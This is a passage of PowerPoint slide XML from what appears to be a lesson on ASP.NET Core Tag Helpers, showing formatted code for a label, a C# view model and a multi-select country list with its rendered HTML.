                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ"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label</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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="Email"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Email Address</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label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endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36509183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Tag Helper</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SimpleViewModel</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</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public</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IEnumerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CountryCodes</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get</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set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="2959304"/>
            <a:ext cx="5141576" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>asp-for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CountryCodes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>items</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ViewBag.Countries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5422182" y="2783488"/>
            <a:ext cx="6589986" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="cs-CZ" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CountryCodes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CountryCodes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>multiple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>multiple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>selected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>selected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="CA"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Canada</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
